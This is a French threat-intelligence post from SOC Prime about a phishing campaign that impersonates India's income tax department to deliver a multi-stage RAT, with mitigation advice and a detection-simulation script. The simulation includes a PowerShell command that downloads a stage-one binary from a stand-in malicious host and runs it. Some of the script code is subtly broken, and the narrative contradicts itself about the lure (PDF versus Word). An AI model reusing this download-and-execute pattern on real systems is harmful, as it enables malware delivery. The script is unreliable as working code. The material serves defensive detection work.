SOC Prime Bias: Moyen

30 Dec 2025 13:29 UTC

Campagne de Phishing Usurpe l’Impôt sur le Revenu Indien pour Cibler les Entreprises

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Suivre
Campagne de Phishing Usurpe l’Impôt sur le Revenu Indien pour Cibler les Entreprises
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Une opération de phishing imitant le département des impôts sur le revenu indien distribue un PDF piégé qui oriente les destinataires vers un portail de conformité contrefait. Le site incite les victimes à télécharger un fichier ZIP contenant un installateur NSIS signé, qui déploie ensuite un cheval de Troie d’accès à distance à plusieurs étapes. Le RAT persiste en créant un service Windows et communique avec plusieurs serveurs de commande et de contrôle via des ports non standards.

Investigation

Les chercheurs ont analysé l’appât PDF, l’URL intégrée et le flux de travail de l’installateur NSIS en chaîne. Ils ont documenté les binaires déposés sur le disque, la création d’un dossier d’installation caché, et l’enregistrement de NSecRTS.exe comme un service Windows. Le rapport capturait également les communications sortantes vers trois adresses IP et soulignait l’utilisation de charges signées tout au long de la chaîne de livraison.

Atténuation

Bloquer le domaine malveillant et les adresses IP associées à la périphérie et via les contrôles de proxy. Renforcer les protections des e-mails pour identifier les pièces jointes et liens sur le thème des impôts conduisant à des portails de conformité imités. Empêcher l’exécution automatique d’installateurs non fiables lorsque possible, et surveiller la création de services suspects — spécialement tout ce qui porte le nom Service de protection en temps réel de Windows.

Réponse

Alerter sur les noms de fichiers, hachages et activités d’enregistrement de service Windows liés à la chaîne d’infection. Isoler les points d’extrémité impactés, acquérir des images mémoire et disque, et effectuer un balayage médico-légal complet pour identifier d’autres étapes RAT ou outils. Supprimer les artéfacts de persistance et réinitialiser les identifiants potentiellement exposés pour empêcher toute nouvelle entrée.

Flux d’attaque

Exécution de Simulation

Prérequis : Le contrôle pré-vol de la télémétrie et de la base doit avoir été passé.

Rationale : Cette section détaille l’exécution précise de la technique d’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et visent à générer la télémétrie exacte attendue par la logique de détection.

  • Narratif & Commandes de l’attaque :
    Un adversaire délivre un e-mail de phishing intitulé « Avis d’impôt sur le revenu ». La pièce jointe est un document Word malveillant qui dépose setup_Ir5swQ3EpeuBpePEpew=.exe to %TEMP%. La victime exécute le fichier, qui à son tour génère Sibuia.exe (la vraie charge utile) comme son enfant. Cette chaîne parent-enfant est conçue pour contourner les alertes génériques de création de processus mais est interceptée par la règle Sigma.

    Étapes effectuées sur l’hôte compromis :

    1. Déposez le binaire de première étape :
      $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe"
      Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1
    2. Exécuter le binaire de première étape :
      Start-Process -FilePath $stage1 -NoNewWindow
    3. Le binaire de première étape crée en interne le binaire de la deuxième étape Sibuia.exe dans le même répertoire et le lance : (Simulé par le script de test ci-dessous.)
  • Script de Test de Régression :
    Le script ci-dessous reproduit la relation exacte parent‑enfant requise pour déclencher la règle.

    # -------------------------------------------------
    # Simulation de la chaîne de phishing sur les impôts indiens
    # -------------------------------------------------
    # Définir les chemins
    $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe"
    $stage2 = "$env:TEMPSibuia.exe"
    
    # Créer des binaires factices (zéro octet – suffisant pour la journalisation Sysmon)
    Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII
    Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII
    
    # S'assurer que les fichiers sont exécutables (Windows n'a pas besoin de chmod)
    Write-Host "[*] Lancement stage1..."
    $proc1 = Start-Process -FilePath $stage1 -PassThru
    
    # Donner un moment à stage1 pour « lancer » stage2 (simulé par lancement direct)
    Start-Sleep -Milliseconds 500
    
    Write-Host "[*] Stage1 lance stage2 (Sibuia.exe)..."
    $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id
    
    Write-Host "[+] Simulation complète. Vérifiez la détection dans le SIEM."
    # -------------------------------------------------
  • Commandes de Nettoyage :
    Supprimez les artéfacts et terminez tous les processus restants.

    # Arrêter tous les processus restants
    Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force
    Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Supprimer les fichiers
    Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue
    
    Write-Host "[*] Nettoyage terminé."